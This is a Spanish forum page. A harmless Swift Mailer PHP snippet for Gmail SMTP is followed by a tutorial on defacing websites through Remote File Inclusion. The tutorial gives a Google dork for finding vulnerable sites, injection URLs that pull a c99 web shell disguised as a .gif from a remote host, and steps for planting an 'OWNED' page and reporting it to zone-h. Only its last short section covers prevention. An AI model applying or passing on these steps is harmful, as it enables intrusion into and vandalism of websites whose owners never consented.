itzjoseph19
Usuario (Perú)
Swift Mailer es probablemente la mejor librería para enviar correos mediante smtp y sendmail que existe para php. Escrita por Fabien Potencier, CEO de Sensio Labs y Lead developer del framework Symfony para php.El siguiente código nos permite enviar correo usando el servidor smtp de gmail con esta herramienta:dijo:$transport = Swift_SmtpTransport::newInstance('smtp.gmail.com', 465, 'ssl') ->setUsername('[email protected]') ->setPassword('tu contraseña');//Creamos el mailer pasándole el transport con la configuración de gmail$mailer = Swift_Mailer::newInstance($transport);//Creamos el mensaje$message = Swift_Message::newInstance($subject) ->setFrom(array('[email protected]' => 'ItzJoseph19')) ->setTo($to_addresses) ->setBody($body);//Enviamos$result = $mailer->send($message);Algunas de sus principales características son: conectividad persistente para mejorar el rendimiento; soporte para internacionalización (i18n); carga balanceada; SSL & TLS Support – para servidores Gmail; permite incluir imágenes y otros tipos de archivos; soporte total para MIME 1.0; procesos por lotes; envía adjuntos de cualquier tamañano incluso con el límite de 8MB en la memoria de PHP; soporte para múltiples adjuntos; permite establecer la prioridad del mensaje;Sitio: www.swiftmailer.orgDescarga: Suift MailerVía: www.webresourcesdepot.com

1- Que es RFI?2- Que es una SHELL?3- Como encontrar una web vulnerable?4- Como explotar la vulnerabilidad?5- Dejando nuesra marca6- Como evitar que nos lo hagan a nosotros***************Que es RFI?***************RFI (Remote File Inclusion) es una vulnerabilidad que solamente existe en paginas dinamicas como php que permite enlazar archivos que estan en servidores remotos, esta vulnerabilidad se produce por una mala programacion del webmaster usando la funcion include()Una web vulnerable podria ser:www.victima.com/index.php?page=videos.phpEsta pagina lo que esta haciendo es incluir el documento "videos.php".Nos aprovecharemos de esto incluyendo nuestros propios archivos pero para eso necesitamos una shell.*********************Que es una shell?*********************Una shell es un interrete de ordenes y comandos. Es una interfaz para comunicar el usuario con el sistema operativo.Esto para que nos sirve en nuestro deface pensaras? Pues esta claro! Con esto ejecutaremos comandos en la web victima.**********************************Como encontrar una web vulnerable?**********************************Como encontrar una web vulnerable? Pues con google!Podemos encontrarlas haciendo busquedas del tipo:allinurl:index.php?page= .phpy variantes, en vez de page otra cosa similar como: go, pg, ir, ...************************************Como explotar la vulnerabilidad?************************************Vamos a ver como explotar la vulnerabilidad, tenemos la webwww.victima.com/index.php?page=videos.phppara comprobar que es vulnerable vamos a poner:page=http://www.Zeromix.Tk (no olvides el http que es muy importante!)y quedaria algo como...http://www.victima.com/index.php?pag...www.Zeromix.Tksi ves que nuestra bonita web se carga dentro de esa web, enhorabuena! aunque no siempre esta asegurado el deface...ahora vamos a meter nuestra shell ahi, hay muchos tipos de shell, yo recomiendo la c99 ya que es muy facil de usar, asi que la descargamos de esta misma weby si no esta en .gif la ponemos como .gif ya que si estuviera .php se ejecutaria en nuestro servidor.Ahora la subimos a un hosting gratuito mismo como iespana por ejemplo y vamos a nuestra victima y escribimos donde estaba Coricorp la direccion de la shell por ejemplo:http://www.victima.com/index.php?pag...b.com/c99.gif? (Ojo con el ? que a veces es importante)ahora si todo a salido bien deberia abrirse la shell y ahi veriamos lo que podemos hacer, yo recomiendo NO BORRAR NADA pro bueno yo no voy a decir lo que debeis o no debeis hacer*************************Dejando nuestra marca*************************Ahora que tenemos control sobre la web mediante la shell vamos a dejar claro que hemos estado aqui, este es un tema dificil de explicar ya que siempre estara esa gente que borra todo y tambien esos que solo le mandan un mail al admin yo estoy en medio asi que os explicare un poquillo... Yo recomiendo subir nuestro index.html en el que ponga quien a echo el deface pero sin borrar el otro index, si es php el otro el nuestro por ser html tiene preferencia y si nole cambiamos el nombre al otro y ya esta.Recomiendo poner una fotito bien bonita con un OWNED bien grande jajay bueno ahora solo faltaria (si queremos) ir a zone-h y notificar nuestro deface.****************************************Como evitar que nos lo hagan a nosotros****************************************Como ya he dicho los bugs RFI son por culpa del programador asi que para evitarlos simplemente seria en el codigo no dejar que la gente haga lo que quiere por ejemplo.Ejemplo de web vulnerable www.victima.com/index.php?page=Coricorp.php:dijo:<?include($page);?>Y ese codigo lo que hace es incluir $page que seria igual a coricorp.php y para evitarlo podriamos utilizar un if o un switch por ejemplo.<?if ($page == 'coricorp'){include ('coricorp.php');}?>